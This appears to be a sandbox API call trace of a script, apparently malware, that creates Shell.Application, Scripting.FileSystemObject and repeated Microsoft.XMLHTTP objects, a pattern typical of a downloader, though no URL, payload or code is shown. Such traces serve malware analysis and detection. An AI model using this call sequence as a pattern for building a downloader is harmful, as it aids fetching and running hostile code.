	[0485.368] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0485.368] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0485.368] SysStringLen (param_1=0x0) returned 0x0
	[0485.368] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0485.368] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0485.368] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0485.368] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0485.368] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0485.368] ??2@YAPEAX_K@Z () returned 0x62f350
	[0485.368] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0485.368] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0485.368] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0485.369] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0485.369] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0485.369] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0485.369] SysStringLen (param_1=0x0) returned 0x0
	[0485.369] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0485.372] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0485.372] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0485.372] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0485.372] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0485.372] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0485.372] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0486.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0486.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0486.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0486.681] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0486.681] SysStringLen (param_1=0x0) returned 0x0
	[0486.681] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0486.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0486.681] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0486.681] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0486.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0486.681] ??2@YAPEAX_K@Z () returned 0x62f310
	[0486.682] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0486.682] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0486.682] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0486.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0486.682] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0486.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.682] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0486.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0486.685] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0486.685] SysStringLen (param_1=0x0) returned 0x0
	[0486.685] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0486.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0486.685] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0486.685] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0486.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0486.685] ??2@YAPEAX_K@Z () returned 0x62f330
	[0486.685] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0486.685] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0486.686] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0486.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0486.686] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0486.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.686] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0486.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0486.686] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0486.686] SysStringLen (param_1=0x0) returned 0x0
	[0486.686] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0486.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0486.687] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0486.687] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0486.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0486.687] ??2@YAPEAX_K@Z () returned 0x62f310
	[0486.687] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0486.687] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0486.687] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0486.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0486.687] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0486.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.687] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0486.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0486.688] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0486.688] SysStringLen (param_1=0x0) returned 0x0
	[0486.688] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0486.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0486.688] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0486.688] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0486.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0486.688] ??2@YAPEAX_K@Z () returned 0x62f330
	[0486.688] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f330) 
	[0486.688] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0486.688] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0486.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0486.689] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0486.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.689] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0486.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0486.689] longjmp () 
	[0486.689] longjmp () 
	[0486.689] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0486.690] SysStringLen (param_1=0x0) returned 0x0
	[0486.690] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0486.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0486.690] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0486.690] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0486.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0486.690] ??2@YAPEAX_K@Z () returned 0x62f310
	[0486.690] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0486.690] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0486.690] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0486.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0486.690] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
